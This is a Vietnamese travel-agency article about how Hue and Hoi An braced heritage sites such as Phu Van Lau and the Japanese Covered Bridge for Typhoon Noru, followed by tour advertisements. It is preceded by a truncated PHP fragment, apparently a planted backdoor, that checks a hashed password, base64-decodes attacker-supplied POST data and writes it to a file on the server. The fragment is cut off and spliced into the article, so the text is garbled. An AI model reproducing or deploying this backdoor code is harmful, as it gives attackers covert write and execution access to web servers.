function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Siêu bão Noru 2022: Huế, Hội An bảo vệ trước các di tích

Siêu bão Noru 2022: Huế, Hội An bảo vệ trước các di tích

27/09/2022 Đi Để Đến - Group

Huế và Hội An là những địa điểm “đón” siêu bão Noru sớm nhất khi siêu bão này đổ bộ vào nước ta. Trước tình hình nguy cấp đó, cơ quan chính quyền hai nơi này đã ra sức bảo vệ các di tích quan trọng.

CÔNG TÁC CHUẨN BỊ ĐỐI PHÓ VỚI SIÊU BÃO NORU CỦA HUẾ

Sự nhanh chóng của Trung tâm bảo tồn cố đô Huế

Nhận thông báo từ các cấp chính quyền về mức độ nguy hiểm của siêu bão Noru, Trung tâm bảo tồn di tích cố đô Huế đã ngay lập tức cử lực lượng tiến hành phòng chống và bảo vệ các di tích tại đây.

Trung tâm bảo tồn đã cử lực lượng tiến hành giằng, buộc các cơ sở di tích bằng dây cáp. Điều này nhằm đảm bảo các di tích có thể còn nguyên vẹn trước gió mạnh và mưa của siêu bão Noru.

Trước đó, tổ công tác đã tiến hành kiểm tra và xác định tình trạng của khu di tích. Sau đó tổ công tác đã đưa ra các giải pháp phòng chống hiệu quả nhất.

sieu bao noru - trung tam bao ton di tich co do hue

Trung tâm bảo tồn di tích cố đô Huế khẩn trương tổ chức công tác bảo vệ các công trình lịch sử (Ảnh: Sưu tầm)

Khó khăn khi bảo vệ di tích trước siêu bão Noru

sieu bao noru - bao ve khu di tich hue

Công tác bảo vệ khu di tích Huế gặp khó khăn (Ảnh: Sưu tầm)

Quần thể di tích cố đô Huế tập trung nhiều các công trình kiến trúc có giá trị đặc biệt không chỉ với ngành du lịch trong và ngoài nước. Bởi vì khu di tích được UNESCO công nhận là di sản văn hóa thế giới từ năm 1993.

Nơi đây tập trung hàng trăm di tích với số lượng lớn công trình kiến trúc cổ được xây dựng từ thời nhà Nguyễn. Hơn nữa, các công trình còn trải rộng khắp từ TP.Huế đến các huyện vùng xung quanh.

Vì các công trình di tích có đặc điểm xây dựng lâu đời và vị trí trải rộng, nên công tác phòng chống siêu bão Noru tốn nhiều thời gian và công sức. Nhưng trước tình hình siêu bão Noru di chuyển nhanh vào nước ta, công tác bảo vệ di tích phải diễn ra cực kì gấp rút.

Xem thêm >>> 10+ Địa điểm du lịch Huế: Xứ sở nên thơ từ cảnh đẹp mơ mộng

Hoạt động phòng chống siêu bão Noru

Trung tâm bảo tồn di tích cố đô Huế đã ra quân bảo vệ những công trình lịch sử. Trung tâm đã huy động tối đa lực lượng để giằng, buộc các dây thép chắc chắn. Việc này nhằm giúp tăng khả năng chống chịu của các công trình trước gió siêu bão Noru khắc nghiệt.

sieu bao noru - hoat dong giang chong di tich

Hoạt động chống đỡ di tích được triển khai gấp rút (Ảnh: Sưu tầm)

Theo ông Hoàng Việt Trung – Giám đốc Trung tâm bảo tồn di tích cố đô Huế. Các công tác phòng chống và bảo vệ di tích được thực hiện thường xuyên hàng năm. Đặc biệt là trước các mùa mưa và thiên tai bão lũ, các di tích càng được tăng cường bảo vệ.

Di tích Phu Văn Lâu ở cố đô Huế trước siêu bão Noru

Khu di tích Phu Văn Lâu được tăng cường bảo vệ trước siêu bão Noru. Nơi đây được xây dựng từ năm 1819 dưới thời vua Gia Long. Mục đích của địa điểm này là để làm nơi niêm yết những chỉ dụ quan trọng của vua và triều đình. Hoặc kết quả của các kỳ thi lớn do triều đình tổ chức cũng được thông báo tại đây.

sieu bao noru - phu van lau duoc bao ve

Khu di tích Phù Văn Lâu được bảo vệ cẩn thận (Ảnh: Sưu tầm)

Với ý nghĩa lịch sử như vậy, Phu Văn Lâu được coi là công trình quan trọng. Đồng thời Phu Văn Lâu còn có giá trị về kiến trúc và thẩm mỹ khi được các chuyên gia đánh giá cao.

Để có thể bảo vệ khu di tích Phu Văn Lâu trước siêu bão Noru, lực lượng chức năng đã tiến hàng các hoạt động giằng, néo dây để cố định công trình.

Các trụ gỗ của di tích được ưu tiên bảo vệ bằng các dây thép chắc chắn. Phần cánh cửa của di tích được gác chắn bằng các thanh gỗ dày dặn. Việc này giúp hạn chế việc các cánh cửa bị gió siêu bão Noru giật mạnh dẫn đến hư hại. Những đồ trang trí bên trong khu di tích cũng được cất dọn để bảo quản ở nơi an toàn.

Xem thêm >>> Tour du lịch Đà Nẵng – Hội An – Huế – Quảng Bình 4N3Đ

CÔNG TÁC BẢO VỆ DI TÍCH TRƯỚC SIÊU BÃO NORU CỦA HỘI AN

Sự gấp rút của chính quyền Hội An

Ngay khi nhận thông báo về siêu bão Noru, Trung tâm Quản lý và bảo tồn di sản văn hóa Hội An đã có cuộc họp khẩn cấp. Cuộc họp nhằm định hướng các cách thức bảo vệ di sản và phòng chống trước siêu bão Noru nguy hiểm.

Trung tâm đã nhanh chóng huy động toàn bộ lực lượng nhân viên và thuê thêm người để tiến hành công tác bảo vệ di tích. Tất cả lực lượng mà Trung tâm huy động được đã tiến hành chằng chéo, chống đỡ các di tích.

sieu bao noru - chua cau hoi an

Chùa Cầu Hội An trước thềm bão đổ bộ (Ảnh: Sưu tầm)

Trước đó, Trung tâm đã tiến hành khảo sát tất cả 45 điểm di tích để đưa ra phương án bảo vệ tốt nhất. Trung tâm nhận thấy 11 địa điểm di tích bị xuống cấp nghiêm trọng, 21 di tích trong tình trạng xuống cấp nặng và 13 di tích bị xuống cấp nhẹ.

Sau đó, UBND TP.Hội An đã ngay lập tức yêu cầu Trung tâm Quản lý và bảo tồn di sản văn hóa thực hiện các biện pháp bảo vệ. Trung tâm phải chằng, chống các di tích, nhà cổ cẩn thận trước khi siêu bão Noru đổ bộ. Trong đó, di tích chùa Cầu cần được ưu tiên bảo vệ sớm nhất.

Xem thêm >>> Tour Đà Nẵng Hội An 3 ngày 2 đêm

Di tích chùa Cầu – Hội An trước thềm đón siêu bão Noru

Chùa Cầu là một trong những di tích trọng điểm của Hội An. Di tích này vừa mang tính biểu tượng của ngành du lịch địa phương vừa là di sản văn hóa quan trọng.

Tuy nhiên, hiện nay di tích chùa Cầu có dấu hiệu xuống cấp, hư hại. Nhiều phần kết cấu của chùa đã lâu năm và có dấu hiệu bị mục rỗng, yếu ớt. Phần cầu và miếu chùa có dấu hiệu bị tách rời, không còn độ giữ chắc chắn như trước.

Đặc biệt, phần mái chùa có nhiều chỗ bị dột nát. Nếu mưa siêu bão Noru đổ bộ, nước sẽ ngấm từ mái và thấm xuống các kết cấu gỗ gây ảnh hưởng đến chất lượng công trình. Với tình trạng đó, chùa Cầu có nguy cơ bị ảnh hưởng nặng nề bởi siêu bão Noru. Do đó, lực lực bảo vệ di tích đã tiến hành chống đỡ chùa cẩn thận.

sieu bao noru - bao ve chua cau hoi an

Hoạt động chống đỡ và bảo vệ chùa Cầu Hội An (Ảnh: Sưu tầm)

Cụ thể, chùa Cầu được chống đỡ và gia cố tại 4 vị trí trọng yếu. Công cụ chống đỡ sẽ được dùng bằng gỗ để không làm ảnh hưởng đến kết cấu sẵn có của chùa.

Theo phóng viên tại hiện trường cho biết, trong số những người được thuê tham gia chống đỡ di tích có một thợ mộc. Đó là ông Hùng, ông cũng cho biết rằng sẽ phải rất cẩn thận để việc gia cố thêm các phần gỗ không gây hư hại kết cấu của chùa.

Ông Hùng nói thêm rằng ông sẽ phải sử dụng cao su để kê vào các điểm nối. Việc này nhằm hạn chế dấu tích gây ra cho phần gỗ của di tích. Hơn nữa, ông cũng sẽ không đóng đinh mà sử dụng dây cao su để đảm bảo tính nguyên vẹn của gỗ.

Xem thêm >>> Tour Đà Nẵng – Sơn Trà – Hội An – Bà Nà – Huế 4N3Đ siêu rẻ

Công tác bảo vệ di tích tại Huế và Hội An trước siêu bão Noru được tiến hành nhanh chóng và cẩn thận. Hy vọng rằng, siêu bão khi đổ bộ vào nước ta sẽ suy yếu nhanh và không gây nhiều thiệt hại cho miền Trung.

Sau khi siêu bão Noru tan, các hoạt động thường ngày sẽ được khôi phục trở lại. Để ủng hộ hoạt động du lịch của miền Trung, hãy đặt ngay tour du lịch bằng cách gọi vào số hotline 1900 3398 để được hỗ trợ và tư vấn nhé.

ĐĂNG KÍ ĐẶT TOUR DU LỊCH GIÁ RẺ

 • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
  Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
 • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
  Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
 • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
  Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
 • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
  Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
 • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
  Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
 • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
  Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]